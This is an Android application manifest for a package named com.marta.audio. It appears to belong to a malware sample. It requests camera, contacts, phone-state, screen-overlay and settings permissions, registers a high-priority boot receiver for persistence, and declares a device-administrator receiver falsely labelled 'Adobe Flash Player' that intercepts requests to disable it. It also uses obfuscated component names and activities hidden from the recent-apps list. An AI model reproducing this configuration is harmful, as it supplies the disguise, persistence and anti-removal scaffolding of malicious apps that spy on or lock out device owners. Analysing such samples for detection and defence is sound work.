<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" android:versionCode="1" android:versionName="1.0" package="com.marta.audio">
    <uses-sdk android:minSdkVersion="8" android:targetSdkVersion="19"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <uses-permission android:name="android.permission.WAKE_LOCK"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
    <uses-permission android:name="android.permission.CAMERA"/>
    <uses-permission android:name="android.permission.READ_CONTACTS"/>
    <uses-permission android:name="android.permission.GET_TASKS"/>
    <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
    <uses-feature android:name="android.hardware.camera.front" android:required="false"/>
    <uses-feature android:name="android.hardware.telephony"/>
    <application android:label="@string/app_name" android:icon="@drawable/ic_launcher" android:allowBackup="true">
        <service android:name="com.marta.audio.xr" android:process=":zlc"/>
        <service android:name="com.marta.audio.xHex" android:process=":zprt"/>
        <receiver android:name="com.marta.audio.Dep"/>
        <activity android:label="@string/app_name" android:name="com.marta.audio.mapR" android:excludeFromRecents="true"/>
        <activity android:label="@string/app_name" android:name="com.marta.audio.ssPhoto" android:excludeFromRecents="true"/>
        <receiver android:name="com.marta.audio.air" android:permission="android.permission.RECEIVE_BOOT_COMPLETED">
            <intent-filter android:priority="999">
                <action android:name="android.intent.action.REBOOT"/>
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
                <action android:name="android.intent.action.QUICKBOOT_POWERON"/>
            </intent-filter>
        </receiver>
        <receiver android:label="Adobe Flash Player" android:name="com.marta.audio.micky" android:permission="android.permission.BIND_DEVICE_ADMIN" android:enabled="true">
            <meta-data android:name="android.app.device_admin" android:resource="@xml/device_admin_data"/>
            <meta-data android:name="checkDelay" android:value="1"/>
            <meta-data android:name="preventRestart" android:value="true"/>
            <meta-data android:name="stopOnDeviceLock" android:value="false"/>
            <intent-filter>
                <action android:name="android.app.action.ACTION_DEVICE_ADMIN_DISABLE_REQUESTED"/>
                <action android:name="android.app.action.DEVICE_ADMIN_ENABLED"/>
            </intent-filter>
            <category android:name="android.intent.category.DEFAULT"/>
        </receiver>
        <activity android:label="@string/app_name" android:name="com.marta.audio.Mot" android:excludeFromRecents="true" android:screenOrientation="portrait" android:configChanges="keyboard|keyboardHidden|orientation">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
    </application>
</manifest>
